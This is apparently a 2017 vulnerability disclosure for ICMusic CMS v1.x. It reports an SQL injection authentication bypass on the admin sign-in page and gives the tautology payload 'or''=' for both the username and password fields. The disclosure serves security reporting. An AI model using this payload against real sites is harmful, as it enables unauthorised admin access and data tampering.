ICMusic CMS 1.x SQL Injection
Posted on 20 March 2017
################################################ #Title: ICMusic CMS v1.x - Authentication Bypass #Credit: Bilal KARDADOU #Vendor: http://www.icloudcenter.com #Vendor URL: http://www.icloudcenter.com/music-site-script.htm #Product: ICMusic CMS v1.x #Google Dork: N/A ################################################ # # Product & Service Introduction: # # "ICMusic" is a music directory site script, ready for use web directory of music providing audio files. The site # is available for users in four different languages (English , Spanish, Frensh and German). Users may # search the directory for desired music files and listen to them. The site contains an advanced administration # panel for management of the sites data, postings approval and much more. # # http://localhost/icmusic/admin/signin.php # # Username: 'or''=' # Password: 'or''=' # # PoC: # http://prntscr.com/el6qal # # Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127) ################################################ -- *Bilal Kardadou* IT Security Consultant *E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |
